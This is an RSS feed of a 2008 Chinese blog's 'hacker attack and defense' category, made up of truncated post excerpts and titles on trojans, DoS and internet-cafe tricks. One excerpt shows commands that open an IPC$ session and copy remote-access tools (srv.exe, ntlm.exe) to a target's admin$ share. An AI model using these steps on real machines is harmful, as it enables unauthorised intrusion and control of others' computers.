<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>^_^何建华的自由空间^_^ - 黑客攻防</title><link>http://blog.csdn.net/hejianhua/category/199350.aspx</link><description /><dc:language>zh-CN</dc:language><lastUpdateTime>Sun, 12 Oct 2008 17:51:00 GMT</lastUpdateTime><ttl>60</ttl><item><dc:creator>何建华</dc:creator><title>如何做代理？</title><link>http://blog.csdn.net/hejianhua/archive/2008/10/12/3064476.aspx</link><pubDate>Sun, 12 Oct 2008 17:47:00 GMT</pubDate><guid>http://blog.csdn.net/hejianhua/archive/2008/10/12/3064476.aspx</guid><wfw:comment>http://blog.csdn.net/hejianhua/comments/3064476.aspx</wfw:comment><comments>http://blog.csdn.net/hejianhua/archive/2008/10/12/3064476.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.csdn.net/hejianhua/comments/commentRss/3064476.aspx</wfw:commentRss><trackback:ping>http://tb.blog.csdn.net/TrackBack.aspx?PostId=3064476</trackback:ping><description>需要软件：srv.exe，ntlm.exe，snakeSksockserver.exe，SocksCap.exe。       首先我们在命令提示符下建立IPC$管道：            net use \\127.0.0.1\ipc$ "密码" /user:帐号      通道建立好后，我们把srv.exe sss.exe ntlm.exe全部上传。       c:\copy srv.exe \\10.10.10.10\admin$       1 files copied!       c:\copy ntlm.exe \\10.10.10.10\admin$       1 files copied!       c:\copy sss.exe \\10.10.10.10\admin$       1 files copied!       复制完毕后， &lt;img src ="http://blog.csdn.net/hejianhua/aggbug/3064476.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>何建华</dc:creator><title>黑客教程</title><link>http://blog.csdn.net/hejianhua/archive/2008/09/21/2958760.aspx</link><pubDate>Sun, 21 Sep 2008 22:08:00 GMT</pubDate><guid>http://blog.csdn.net/hejianhua/archive/2008/09/21/2958760.aspx</guid><wfw:comment>http://blog.csdn.net/hejianhua/comments/2958760.aspx</wfw:comment><comments>http://blog.csdn.net/hejianhua/archive/2008/09/21/2958760.aspx#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://blog.csdn.net/hejianhua/comments/commentRss/2958760.aspx</wfw:commentRss><trackback:ping>http://tb.blog.csdn.net/TrackBack.aspx?PostId=2958760</trackback:ping><description>&lt;H2&gt;黑客教程&lt;/H2&gt;
&lt;DIV class=t_msgfont id=postmessage_16219&gt;最详细的&lt;SPAN class=t_tag onclick=tagshow(event) href="tag.php?name=%BA%DA%BF%CD"&gt;黑客&lt;/SPAN&gt;入门法则！ (&lt;SPAN class=t_tag onclick=tagshow(event) href="tag.php?name=%BD%CC%B3%CC"&gt;教程&lt;/SPAN&gt;比较老，但里面很多&lt;SPAN class=t_tag onclick=tagshow(event) href="tag.php?name=%BB%F9%B4%A1"&gt;基础&lt;/SPAN&gt;的东西，很实用）&lt;BR&gt;第一章------关于找软件&lt;BR&gt;第二章------关于被入侵&lt;BR&gt;第三章------基础知识和入侵步骤&lt;BR&gt;第四章------关于&lt;SPAN class=t_tag onclick=tagshow(event) href="tag.php?name=%C3%FC%C1%EE"&gt;命令&lt;/SPAN&gt;的使用　&lt;BR&gt;第五&lt;img src ="http://blog.csdn.net/hejianhua/aggbug/2958760.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>hejianhua</dc:creator><title>简单木马程序设计 </title><link>http://blog.csdn.net/hejianhua/archive/2008/05/09/2422481.aspx</link><pubDate>Fri, 09 May 2008 14:01:00 GMT</pubDate><guid>http://blog.csdn.net/hejianhua/archive/2008/05/09/2422481.aspx</guid><wfw:comment>http://blog.csdn.net/hejianhua/comments/2422481.aspx</wfw:comment><comments>http://blog.csdn.net/hejianhua/archive/2008/05/09/2422481.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.csdn.net/hejianhua/comments/commentRss/2422481.aspx</wfw:commentRss><trackback:ping>http://tb.blog.csdn.net/TrackBack.aspx?PostId=2422481</trackback:ping><description>当你有一门语言基础时和简单的网络知识后就可以开始，C语言就足够了。知道什么是TCP/IP就可以了，需要知道API函数（自己会查就可以了）。 
实质上，木马仅仅是一个网络应用程序一样，就象QQ一样，假若我们把QQ的界面给隐藏了，然后自己能启动，它就可以说是腾讯公司的一个木马。 
我选用TCP协议编写木马，所以必须知道一些TCP的套路。 
木马一个客户端，由你控制，另外一个服务端，种植在别人机器上。这样形成了Client/Server模型.&lt;img src ="http://blog.csdn.net/hejianhua/aggbug/2422481.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>hejianhua</dc:creator><title>欢乐园网吧免费上网大法</title><link>http://blog.csdn.net/hejianhua/archive/2006/05/03/706285.aspx</link><pubDate>Wed, 03 May 2006 02:00:00 GMT</pubDate><guid>http://blog.csdn.net/hejianhua/archive/2006/05/03/706285.aspx</guid><wfw:comment>http://blog.csdn.net/hejianhua/comments/706285.aspx</wfw:comment><comments>http://blog.csdn.net/hejianhua/archive/2006/05/03/706285.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.csdn.net/hejianhua/comments/commentRss/706285.aspx</wfw:commentRss><trackback:ping>http://tb.blog.csdn.net/TrackBack.aspx?PostId=706285</trackback:ping><description>欢乐园网吧免费上网大法&lt;img src ="http://blog.csdn.net/hejianhua/aggbug/706285.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>hejianhua</dc:creator><title>世界黑客目前状况排名和世界第一黑客</title><link>http://blog.csdn.net/hejianhua/archive/2006/05/03/706284.aspx</link><pubDate>Wed, 03 May 2006 01:58:00 GMT</pubDate><guid>http://blog.csdn.net/hejianhua/archive/2006/05/03/706284.aspx</guid><wfw:comment>http://blog.csdn.net/hejianhua/comments/706284.aspx</wfw:comment><comments>http://blog.csdn.net/hejianhua/archive/2006/05/03/706284.aspx#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://blog.csdn.net/hejianhua/comments/commentRss/706284.aspx</wfw:commentRss><trackback:ping>http://tb.blog.csdn.net/TrackBack.aspx?PostId=706284</trackback:ping><description>世界黑客目前状况排名和世界第一黑客&lt;img src ="http://blog.csdn.net/hejianhua/aggbug/706284.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>hejianhua</dc:creator><title>一位少年黑客的自白 ```</title><link>http://blog.csdn.net/hejianhua/archive/2006/05/03/706278.aspx</link><pubDate>Wed, 03 May 2006 01:56:00 GMT</pubDate><guid>http://blog.csdn.net/hejianhua/archive/2006/05/03/706278.aspx</guid><wfw:comment>http://blog.csdn.net/hejianhua/comments/706278.aspx</wfw:comment><comments>http://blog.csdn.net/hejianhua/archive/2006/05/03/706278.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.csdn.net/hejianhua/comments/commentRss/706278.aspx</wfw:commentRss><trackback:ping>http://tb.blog.csdn.net/TrackBack.aspx?PostId=706278</trackback:ping><description>一位少年黑客的自白 ```&lt;img src ="http://blog.csdn.net/hejianhua/aggbug/706278.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>hejianhua</dc:creator><title>7种DoS攻击方法简述</title><link>http://blog.csdn.net/hejianhua/archive/2006/05/03/706270.aspx</link><pubDate>Wed, 03 May 2006 01:45:00 GMT</pubDate><guid>http://blog.csdn.net/hejianhua/archive/2006/05/03/706270.aspx</guid><wfw:comment>http://blog.csdn.net/hejianhua/comments/706270.aspx</wfw:comment><comments>http://blog.csdn.net/hejianhua/archive/2006/05/03/706270.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.csdn.net/hejianhua/comments/commentRss/706270.aspx</wfw:commentRss><trackback:ping>http://tb.blog.csdn.net/TrackBack.aspx?PostId=706270</trackback:ping><description>7种DoS攻击方法简述&lt;img src ="http://blog.csdn.net/hejianhua/aggbug/706270.aspx" width = "1" height = "1" /&gt;</description></item></channel></rss>